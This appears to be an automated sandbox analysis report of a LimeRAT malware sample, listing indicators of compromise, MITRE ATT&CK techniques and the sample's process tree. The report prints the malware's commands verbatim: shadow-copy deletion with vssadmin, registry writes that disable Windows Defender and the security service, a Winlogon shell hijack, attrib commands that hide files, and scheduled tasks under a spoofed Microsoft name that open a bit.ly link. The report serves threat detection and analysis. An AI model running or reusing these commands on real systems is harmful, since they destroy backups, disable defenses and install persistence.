limerat | 5434600792908e06aada3ae4126942fe553fad402683db1e4bdd11b4b3e3cd12

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\""	Client.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\""	svchost.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Client.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Client.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Client.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Client.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	Client.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation	Client.exe

Executes dropped EXE 1 IoCs

pid	Process
2280	svchost.exe

Enumerates connected drives 3 TTPs 15 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
1174	pastebin.com
1656	pastebin.com
148	pastebin.com
193	pastebin.com
810	pastebin.com
24	pastebin.com
1224	pastebin.com
1279	pastebin.com
326	pastebin.com
385	pastebin.com
484	pastebin.com
472	pastebin.com
579	pastebin.com
601	pastebin.com
1360	pastebin.com
163	pastebin.com
168	pastebin.com
1079	pastebin.com
1072	pastebin.com
887	pastebin.com
1239	pastebin.com
626	pastebin.com
829	pastebin.com
855	pastebin.com
281	pastebin.com
328	pastebin.com
531	pastebin.com
1720	pastebin.com
1750	pastebin.com
110	pastebin.com
645	pastebin.com
1627	pastebin.com
702	pastebin.com
1537	pastebin.com
819	pastebin.com
137	pastebin.com
713	pastebin.com
1561	pastebin.com
719	pastebin.com
793	pastebin.com
1469	pastebin.com
1471	pastebin.com
709	pastebin.com
807	pastebin.com
932	pastebin.com
480	pastebin.com
551	pastebin.com
1154	pastebin.com
248	pastebin.com
570	pastebin.com
1006	pastebin.com
151	pastebin.com
1303	pastebin.com
1140	pastebin.com
1264	pastebin.com
658	pastebin.com
673	pastebin.com
827	pastebin.com
1759	pastebin.com
1025	pastebin.com
1665	pastebin.com
188	pastebin.com
316	pastebin.com
454	pastebin.com

Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3116	cmd.exe
216	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Interacts with shadow copies 3 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
540	vssadmin.exe
4496	vssadmin.exe
4568	vssadmin.exe
2528	vssadmin.exe
4716	vssadmin.exe
3012	vssadmin.exe
2944	vssadmin.exe
4396	vssadmin.exe
3652	vssadmin.exe
3260	vssadmin.exe
4440	vssadmin.exe
1376	vssadmin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4836	schtasks.exe
4748	schtasks.exe
4628	schtasks.exe
696	schtasks.exe
3980	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3468	Client.exe
3468	Client.exe
3468	Client.exe
4000	powershell.exe
4000	powershell.exe
2280	svchost.exe
2280	svchost.exe
2280	svchost.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	3468	Client.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeBackupPrivilege	2532	vssvc.exe
Token: SeRestorePrivilege	2532	vssvc.exe
Token: SeAuditPrivilege	2532	vssvc.exe
Token: SeBackupPrivilege	3468	Client.exe
Token: SeSecurityPrivilege	3468	Client.exe
Token: SeBackupPrivilege	3468	Client.exe
Token: SeDebugPrivilege	2280	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3468 wrote to memory of 3116	3468	Client.exe	86
PID 3468 wrote to memory of 3116	3468	Client.exe	86
PID 3116 wrote to memory of 4012	3116	cmd.exe	88
PID 3116 wrote to memory of 4012	3116	cmd.exe	88
PID 3116 wrote to memory of 3556	3116	cmd.exe	89
PID 3116 wrote to memory of 3556	3116	cmd.exe	89
PID 3468 wrote to memory of 4000	3468	Client.exe	90
PID 3468 wrote to memory of 4000	3468	Client.exe	90
PID 3468 wrote to memory of 4032	3468	Client.exe	92
PID 3468 wrote to memory of 4032	3468	Client.exe	92
PID 3468 wrote to memory of 4920	3468	Client.exe	93
PID 3468 wrote to memory of 4920	3468	Client.exe	93
PID 3468 wrote to memory of 3548	3468	Client.exe	94
PID 3468 wrote to memory of 3548	3468	Client.exe	94
PID 3468 wrote to memory of 5004	3468	Client.exe	95
PID 3468 wrote to memory of 5004	3468	Client.exe	95
PID 3468 wrote to memory of 3972	3468	Client.exe	96
PID 3468 wrote to memory of 3972	3468	Client.exe	96
PID 3468 wrote to memory of 1124	3468	Client.exe	97
PID 3468 wrote to memory of 1124	3468	Client.exe	97
PID 3468 wrote to memory of 544	3468	Client.exe	98
PID 3468 wrote to memory of 544	3468	Client.exe	98
PID 3468 wrote to memory of 4048	3468	Client.exe	99
PID 3468 wrote to memory of 4048	3468	Client.exe	99
PID 3468 wrote to memory of 392	3468	Client.exe	100
PID 3468 wrote to memory of 392	3468	Client.exe	100
PID 3468 wrote to memory of 2672	3468	Client.exe	101
PID 3468 wrote to memory of 2672	3468	Client.exe	101
PID 3468 wrote to memory of 4444	3468	Client.exe	102
PID 3468 wrote to memory of 4444	3468	Client.exe	102
PID 3468 wrote to memory of 740	3468	Client.exe	103
PID 3468 wrote to memory of 740	3468	Client.exe	103
PID 3468 wrote to memory of 2720	3468	Client.exe	104
PID 3468 wrote to memory of 2720	3468	Client.exe	104
PID 4920 wrote to memory of 428	4920	cmd.exe	118
PID 4920 wrote to memory of 428	4920	cmd.exe	118
PID 3548 wrote to memory of 3260	3548	cmd.exe	119
PID 3548 wrote to memory of 3260	3548	cmd.exe	119
PID 544 wrote to memory of 4440	544	cmd.exe	121
PID 544 wrote to memory of 4440	544	cmd.exe	121
PID 4048 wrote to memory of 4568	4048	cmd.exe	122
PID 4048 wrote to memory of 4568	4048	cmd.exe	122
PID 2720 wrote to memory of 1376	2720	cmd.exe	123
PID 2720 wrote to memory of 1376	2720	cmd.exe	123
PID 5004 wrote to memory of 3012	5004	cmd.exe	124
PID 5004 wrote to memory of 3012	5004	cmd.exe	124
PID 392 wrote to memory of 3652	392	cmd.exe	125
PID 392 wrote to memory of 3652	392	cmd.exe	125
PID 4032 wrote to memory of 4396	4032	cmd.exe	126
PID 4032 wrote to memory of 4396	4032	cmd.exe	126
PID 740 wrote to memory of 2528	740	cmd.exe	127
PID 740 wrote to memory of 2528	740	cmd.exe	127
PID 1124 wrote to memory of 2944	1124	cmd.exe	128
PID 1124 wrote to memory of 2944	1124	cmd.exe	128
PID 2672 wrote to memory of 540	2672	cmd.exe	129
PID 2672 wrote to memory of 540	2672	cmd.exe	129
PID 3972 wrote to memory of 4716	3972	cmd.exe	130
PID 3972 wrote to memory of 4716	3972	cmd.exe	130
PID 4444 wrote to memory of 4496	4444	cmd.exe	131
PID 4444 wrote to memory of 4496	4444	cmd.exe	131
PID 3468 wrote to memory of 696	3468	Client.exe	133
PID 3468 wrote to memory of 696	3468	Client.exe	133
PID 3468 wrote to memory of 4628	3468	Client.exe	134
PID 3468 wrote to memory of 4628	3468	Client.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4012	attrib.exe
3556	attrib.exe
4108	attrib.exe
232	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- Modifies WinLogon for persistence
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3468
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
  2⤵
  - Hide Artifacts: Hidden Files and Directories
  - Suspicious use of WriteProcessMemory
  PID:3116
- - C:\Windows\system32\attrib.exe
    attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
    3⤵
    - Views/modifies file attributes
    PID:4012
- - C:\Windows\system32\attrib.exe
    attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
    3⤵
    - Views/modifies file attributes
    PID:3556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4000
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin Delete Shadows /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4032
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4396
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    3⤵
    PID:428
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3548
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:3260
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5004
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3012
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3972
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4716
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1124
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2944
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:544
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4440
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4048
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4568
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:392
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3652
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2672
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:540
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4444
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4496
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2528
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c Vssadmin delete shadowstorage /all /quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2720
- - C:\Windows\system32\vssadmin.exe
    Vssadmin delete shadowstorage /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1376
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "22:47" /sc daily /mo "3" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'http://bit.ly/2HKY0b9"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:696
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "00:53" /sc daily /mo "5" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'http://bit.ly/2HKY0b9"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4628
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "17:17" /sc daily /mo "4" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'http://bit.ly/2HKY0b9"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4748
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "16:13" /sc weekly /mo "1" /d "Wed" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'http://bit.ly/2HKY0b9"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4836
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "07:48" /sc monthly /m "sep" /tn "AD RMS Rights Policy Template Management (Automated)" /tr "'explorer'http://bit.ly/2HKY0b9"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3980
- C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
  "C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2280
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:216
  - - C:\Windows\system32\attrib.exe
      attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
      4⤵
      Views/modifies file attributes
      PID:4108
  - - C:\Windows\system32\attrib.exe
      attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
      4⤵
      Views/modifies file attributes
      PID:232

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry